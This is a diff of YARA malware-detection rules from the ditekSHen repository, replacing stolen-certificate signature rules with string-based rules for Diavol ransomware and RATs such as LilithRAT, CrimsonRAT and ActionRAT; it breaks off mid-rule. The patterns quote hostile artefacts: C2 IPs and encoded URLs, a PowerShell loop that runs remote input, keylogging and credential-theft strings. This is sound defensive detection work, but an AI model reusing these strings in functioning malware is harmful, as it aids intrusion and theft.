-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8341-L8354"
+		id = "390e57b2-207e-5013-899a-0b04aa63a56f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6748-L6757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "71d1f8e9113170f410007b31c0d7316c537001b2a761f1e35d6bd2aa0b39f2d9"
+		logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "005af6c8e9f06a2258c2df70785a5622c8d10d982fdc7f4dbe2f53af6e860359"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "GET_YOUR_FILES_BACK.txt" ascii wide
+		$s2 = ".avos" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0772B4D1D63233D2B8771997Bc8Da5C4 : FILE
+rule DITEKSHEN_MALWARE_Win_Diavol : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Diavol ransomware"
 		author = "ditekSHen"
-		id = "a05a2bc4-a4a3-5e86-9a1c-ed82de7786df"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8356-L8369"
+		id = "df5cea04-505e-5009-b247-ba71b6d81ecc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6759-L6784"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "056fefbc03cff00a40ea9bb65893b92fcc15134c7cf7bf7dedf98f43b44bc03d"
+		logic_hash = "bcc7a9dc2dcb12ded75af9d79ab0f46f0e69da9e9fe72539be6351306ed11c18"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "c6a78692f2fda8908933fb3f1df68592eb5da129caafd33329d1b804006973f7"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "README_FOR_DECRYPT.txt" ascii wide nocase
+		$s2 = ".lock64" fullword ascii wide
+		$s3 = "LockMainDIB" ascii wide
+		$s4 = "locker.divided" ascii wide
+		$s5 = "%tob_dic%/" wide
+		$s6 = "%cid_bot%" wide
+		$m1 = "GENBOTID" ascii wide
+		$m2 = "SHAPELISTS" ascii wide
+		$m3 = "REGISTER" ascii wide
+		$m4 = "FROMNET" ascii wide
+		$m5 = "SERVPROC" ascii wide
+		$m6 = "SMBFAST" ascii wide
+		$c1 = "/Bnyar8RsK04ug/" fullword ascii
+		$c2 = "/landing" fullword ascii
+		$c3 = "/wipe" fullword ascii
+		$c4 = "&ip_local1=111.111.111.111&ip_local2=222.222.222.222&ip_external=2.16.7.12" fullword ascii
+		$c5 = "&group=" fullword ascii
+		$c6 = "/BnpOnspQwtjCA/register" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 5 of ( $m* ) or 4 of ( $c* ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Deea179F5757Fe529043577762419Df : FILE
+rule DITEKSHEN_MALWARE_Win_Margulasrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MargulasRAT"
 		author = "ditekSHen"
-		id = "a6b9b9e4-0998-5f67-8c12-7628ba3a5a56"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8371-L8384"
+		id = "6efabf80-9194-542d-afd2-9bf9c8e26e55"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6786-L6810"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b521363d1d38a4ed1b2b4126aec85ed6bffc23dc4e30f6f6c942e1fa96b0dd8d"
+		logic_hash = "dd5b94c947d97cdc34032f2cb84b4975a1e8f510638857fb6dbe553bcff7d16e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9c4e87ccd6004a70115f8e654b8cc1a80d488876ff2e4e7db598303fa41b3fef"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$pdb1 = "G:\\VP-S-Fin\\memory\\" ascii
+		$pdb2 = "G:\\VP-S-Fin\\Margulas\\" ascii
+		$pdb3 = "G:\\VP-S-Fin\\remote" ascii
+		$pdb4 = "G:\\VP-S-Fin\\" ascii
+		$s1 = "/C choice /C Y /N /D Y /T 1 & Del " fullword wide
+		$s2 = "strToHash" fullword ascii
+		$s3 = "\\socking" fullword wide
+		$s4 = "\\wininets" fullword wide
+		$s5 = "ClientSocket" fullword ascii
+		$s6 = "new Stream()" fullword wide
+		$s7 = "CipherText" fullword ascii
+		$s8 = "WriteAllBytes" fullword ascii
+		$s9 = { 00 50 72 6f 63 65 73 73 00 45 78 69 73 74 73 00}
+		$s10 = "pxR/THCwdLuruMmw8wB8xAUvbno1yPGBTOV9IoOkAp/n7+paQm74pkzlfSKDpAKfTOV9IoOkAp9M5X0ig6QCn0zlfSKDpAKfTOV9IoOkAp" wide
+		$c1 = "149.248.52.61" wide
+		$c2 = "://vpn.nic.in" wide
+		$c3 = "://www.mod.gov.in/dod/sites/default/files/" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) or ( 1 of ( $c* ) and 3 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_061A27A3A3771Bb440Fc16Cadf2675C4 : FILE
+rule DITEKSHEN_MALWARE_Win_Lilithrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LilithRAT"
 		author = "ditekSHen"
-		id = "ef600135-6f5d-59a9-b387-60e8eb97cbf9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8386-L8399"
+		id = "87e56524-f557-5662-86bc-2b26e7c74aee"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6812-L6839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d85b9d2b6fe4ce99670a8f51e84d63f1ec6d0341a3715eeed3e3d6a0fda93dc5"
+		logic_hash = "1e8ac8a329ff99318e12666ea1d90d21bb9b0dff656a5eb1ce741b940c99afd5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9ed703ba7033af5f88a5f5ef0155adc41715d3175eec836822a09a93d56e4b7f"
-		reason = "Matanbuchus"
-		importance = 20
+		hash1 = "132870a1ae6a0bdecaa52c03cfe97a47df8786f148fa8ca113ac2a8d59e3624a"
+		hash2 = "ab7b6e0b28995bdeea44f20c0aba47f95e1d6ba281af3541cd2c04dc6c2a3ad9"
+		hash3 = "b2eeb487046ba1d341fb964069b7e83027b60003334e04e41b467e35c3d2460f"
+		hash4 = "cebcda044c60b709ba4ee0fa9e1e7011a6ffc17285bcc0948d27f866ec8d8f20"
+
+	strings:
+		$pdb1 = "c:\\Users\\Groovi\\Documents\\Visual Studio 2008\\Projects\\TestDll\\" ascii
+		$pdb2 = "C:\\Users\\iceberg\\Downloads\\RAT-Server-master\\RAT-Server-master\\RAT\\Debug\\RAT.pdb" ascii
+		$pdb3 = "C:\\Users\\Samy\\Downloads\\Compressed\\Lilith-master\\Debug\\Lilith.pdb" ascii
+		$s1 = "log.txt" fullword ascii
+		$s2 = "keylog.txt" fullword ascii
+		$s3 = "File Listing Completed Successfully." fullword ascii
+		$s4 = "Download Execute" fullword ascii
+		$s5 = "File Downloaded and Executed Successfully." fullword ascii
+		$s6 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
+		$s7 = "CMD session closed" ascii
+		$s8 = "Restart requested: Restarting self" fullword ascii
+		$s9 = "Termination requested: Killing self" fullword ascii
+		$s10 = "Couldn't write to CMD: CMD not open" fullword ascii
+		$s11 = "keydump" fullword ascii
+		$s12 = "remoteControl" fullword ascii
+		$s13 = "packettype" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Westeast Tech Consulting, Corp." and pe.signatures [ i ] . serial == "06:1a:27:a3:a3:77:1b:b4:40:fc:16:ca:df:26:75:c4" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 6 of ( $s* ) or ( 1 of ( $pdb* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_06675181E7B5E1030B3D40926E2A47D3 : FILE
+rule DITEKSHEN_MALWARE_Win_Epicenterrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects EpicenterRAT"
 		author = "ditekSHen"
-		id = "2452580b-bbe8-5d54-888e-6f8fffb055cf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8401-L8414"
+		id = "6abe6e94-d7f5-5f88-96a6-a8fad599ef6a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6841-L6863"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14d963fd03187afb7afabc208e36d8bb45ec818b27782a6c3037229f82bf22d6"
+		logic_hash = "e9086dff22e301f57c6a9bdb38fbed8e902d5b8ca20a5e5b3cda56db08d5582e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b617253b3695fd498d645bd8278d1bdae2bc36bd4da713c6938e3fe6b0cdb9a4"
-		reason = "NetWire"
-		importance = 20
+
+	strings:
+		$pdb1 = "c:\\Users\\Zombie\\Desktop\\MutantNinja\\" ascii
+		$pdb2 = "\\Epicenter Client\\" ascii
+		$s1 = "PROCESS_LIST<%SEP%>" fullword wide
+		$s2 = "GETREADY_RECV_FILE<%SEP%>" fullword wide
+		$s3 = "DISPLAY<%SEP%>" wide
+		$s4 = "GETSCREEN<%SEP%>" fullword wide
+		$s5 = "dumpImageName" fullword ascii
+		$s6 = "dumpLoc" fullword ascii
+		$s7 = "EXPECT<%SEP%>filelist<%SEP%>" fullword wide
+		$s8 = "<%FSEP%>FOLDER<%FSEP%>-<%SEP%>" fullword wide
+		$s9 = "KILLPROC<%SEP%>" fullword wide
+		$s10 = "LAUNCHPROC<%SEP%>" fullword wide
+		$s11 = "cmd.exe /c start /b " fullword wide
+		$s12 = "savservice" fullword wide
+		$s13 = "getvrs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORANGE VIEW LIMITED" and pe.signatures [ i ] . serial == "06:67:51:81:e7:b5:e1:03:0b:3d:40:92:6e:2a:47:d3" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $pdb* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dbc03Ca7E6Ae6Db6 : FILE
+rule DITEKSHEN_MALWARE_Win_Lastconn : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LastConn"
 		author = "ditekSHen"
-		id = "801bc9fc-0bd6-5c46-8c45-8cb06cfc4309"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8416-L8429"
+		id = "18727c30-d84d-5ffa-acd4-2cc54e553604"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6865-L6894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d188663b00870e98984b4be4c72b0fd183b5fb8dd61512c1d65d386f1ebad0a"
+		logic_hash = "94f5874353d0fb475595373c06a0de91603cad9b435d35dc00febf90608d6b5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e059776cb5e640569a06c2548e87af5bd655f5d4815b8f6e9482835455930987"
-		reason = "CobaltStrike"
-		importance = 20
+
+	strings:
+		$s1 = "System.Net.Http.SysSR" fullword wide
+		$s2 = "System.Net.Http.WrSR" fullword wide
+		$s3 = "yyyy'-'MM'-'dd'T'HH':'mm':'ss.FFFFFFFK" fullword wide
+		$s4 = { 63 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 0c 6e
+               00 6f 00 74 00 69 00 66 00 79 00 04 06 12 80 e8
+               05 00 00 12 80 e8 08 75 00 73 00 65 00 72 00 08
+               74 00 65 00 61 00 6d 00 06 61 00 70 00 70 00 0c
+               6e 00 6f 00 61 00 75 00 74 00 68 00 }
+		$s5 = { 68 00 69 00 64 00 64 00 65 00 6e 00 10 64 00 69
+               00 73 00 61 00 6c 00 6c 00 6f 00 77 00 0e 65 00
+               78 00 74 00 65 00 6e 00 64 00 73 00 04 69 00 64
+               00 16 75 00 6e 00 69 00 71 00 75 00 65 00 49 00
+               74 00 65 00 6d 00 73 }
+		$s6 = "<RunFileOnes>d__" ascii
+		$s7 = "<UploadFile>d__" ascii
+		$s8 = "<ChunkUpload>d__" ascii
+		$s9 = "<StartFolder>d__" ascii
+		$s10 = "<ReadFileAlw>d__" ascii
+		$s12 = "<WriteFileToD>d__" ascii
+		$s13 = "<ReadFile>d__" ascii
+		$s14 = "<GetUpload>d__" ascii
+		$s15 = "CDropbox.Api.DropboxRequestHandler+<RequestJsonStringWithRetry>d__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" )
+		uint16( 0 ) == 0x5a4d and 12 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_26F855A25890B749578F13E4B9459768 : FILE
+rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CrimsonRAT"
 		author = "ditekSHen"
-		id = "2953afc3-6a46-5126-8f82-52f8dc1f89d6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8431-L8444"
+		id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6896-L6920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2de5a2d4d692c14660a9ec3ed18a7d2d6741a862c86812fcd640b1378281c328"
+		logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7c81ba35732d1998def02461217cfd723150151bc93375a3e27c2cec33915660"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide
+		$s2 = "system volume information|" fullword wide
+		$s3 = "program files (x86)|" fullword wide
+		$s4 = "program files|" fullword wide
+		$s5 = "<SAVE_AUTO<|" fullword wide
+		$s6 = "add_up_files" fullword ascii
+		$s7 = "see_folders" ascii
+		$s8 = "see_files" ascii
+		$s9 = "see_scren" ascii
+		$s10 = "see_recording" ascii
+		$s11 = "see_responce" ascii
+		$s12 = "pull_data" ascii
+		$s13 = "do_process" ascii
+		$s14 = "do_updated" ascii
+		$s15 = "IPSConfig" fullword ascii
+		$s16 = "#Runing|ver#" wide
+		$s17 = "|fileslog=" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo’s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_25Ba18A267D6D8E08Ebc6E2457D58D1E : FILE
+rule DITEKSHEN_MALWARE_Win_Actionrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ActionRAT, CSharp and Delfi variants"
 		author = "ditekSHen"
-		id = "d2c4907e-cec2-5386-96d3-8c122c7557fa"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8446-L8459"
+		id = "ceb4bd65-85c0-5614-a7cb-8f3f2f849eae"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6922-L6955"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38bdfa2291c7c3f81b29d41c65814002db3e4de11928699d2d946e87d313558d"
+		logic_hash = "1552cda3f02c08582e3dd97df98416635a25005081627097df181bfc6aac4665"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		thumbprint = "e59824f73703461c2c170681872a28a9bc4731d4b49079aa3afba1d29f83d736"
-		reason = "BadNews"
-		importance = 20
+
+	strings:
+		$x1 = /<action>(connect|command|drives|getfiles|upload|execute|download)<action>/ fullword wide
+		$x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide
+		$x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide
+		$f1 = "<updateCommand>b__" ascii
+		$f2 = "<getDrives>b__" ascii
+		$f3 = "<getStatus>b__" ascii
+		$f4 = "<getDirectories>b__" ascii
+		$f5 = "<updateUpload>b__" ascii
+		$f6 = "<infinity>b__" ascii
+		$f7 = "<uploadFile>b__" ascii
+		$s1 = "beaconURL" ascii
+		$s2 = "PingReply" ascii
+		$s3 = "updateUpload" ascii
+		$s4 = "updateCommand" ascii
+		$s5 = "runCommand" ascii
+		$s6 = "uploadFile" ascii
+		$s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide
+		$s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s9 = "Mozilla/3.0" fullword wide
+		$s10 = "|directory|N/A|" fullword wide
+		$s11 = "cmd.exe /c" fullword wide
+		$c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide
+		$c2 = /(classification|updatecs|update|beacon)\.php/ wide
+		$c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide
+		$pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii
+		$pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" )
+		uint16( 0 ) == 0x5a4d and ( #x1 > 5 or ( all of ( $f* ) and ( 1 of ( $s* ) or 2 of ( $c* ) ) ) or 7 of ( $s* ) or all of ( $c* ) or ( all of ( $pdb* ) and 4 of them ) or ( 2 of ( $x* ) and 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A2787Fbb4627C91611573E323584113 : FILE
+rule DITEKSHEN_MALWARE_Win_Nodachi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nodachi infostealer"
 		author = "ditekSHen"
-		id = "5da7ac8f-34f7-5949-9987-32e983a77ebe"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8461-L8474"
+		id = "bce0c44d-7e75-5c51-ba93-75bd81896921"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6957-L6972"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4ea9149f28798b48482ff68c3e08593a4510e3bd01e49ebdca7d450f15537e4"
+		logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8badf05b1814d40fb7055283a69a0bc328943100fe12b629f1c14b9448163aac"
-		reason = "Malware"
-		importance = 20
+
+	strings:
+		$x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii
+		$s1 = "/upload/drive/v3/files/{fileId}" ascii
+		$s2 = "main.getTokenFromWeb" ascii
+		$s3 = "main.tokenFromFile" ascii
+		$s4 = "/goLazagne/" ascii
+		$s5 = "/extractor/withoutdrive/main.go" ascii
+		$s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
+		$s7 = "C://Users//public//cred.json" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C81319D20C6F1F1Aec3398522189D90C : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing Queen Of Hearts payload"
 		author = "ditekSHen"
-		id = "d93f571b-49f6-5a8b-9478-1054ede2257f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8476-L8489"
+		id = "b8d222f0-b3ce-5143-816b-4bbcde645672"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6974-L6991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1271d0cc05d35a70a90f605e7c68fc52605570e453e9e67fbeb74762a88a0a96"
+		logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "18d8be8afa6613e2ef037598a6e08e0ef197d420f21aa4050f473fcabd16644a"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "{'session':[{'name':'" ascii
+		$s2 = "begin mainthread ok" wide
+		$s3 = "getcommand error" wide
+		$s4 = "querycode error" wide
+		$s5 = "Code = %d" wide
+		$s6 = "cookie size :%d" wide
+		$s7 = "send request error:%d" wide
+		$s8 = "PmMytex%d" wide
+		$s9 = "%s_%c%c%c%c_%d" wide
+		$s10 = "?what@exception@std@@UBEPBDXZ" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_77550Ed697992B397E3F1Ad8E2A662D1 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing Queen Of Clubs payload"
 		author = "ditekSHen"
-		id = "1d969340-de5e-569e-bfed-a80a1623d1b4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8491-L8504"
+		id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6993-L7007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87a70f10a111c4c5d1c3fb5b1c2a9da528f7d484ae6391c91e4052aba5c6bbe0"
+		logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0c439c7b60714158f62c45921caf30d17dae37ec6cbc2dfdd9d306e18ae6df63"
-		reason = "ParallaxRAT"
-		importance = 20
+
+	strings:
+		$s1 = "Not Support!" fullword wide
+		$s2 = "%s|%s|%s|%s" fullword wide
+		$s3 = "cmd.exe" fullword wide
+		$s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide
+		$s5 = "PowerShell.exe -nop -c %s" fullword wide
+		$s6 = "%s \"%s\" Df" fullword wide
+		$s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii
 
 	condition:
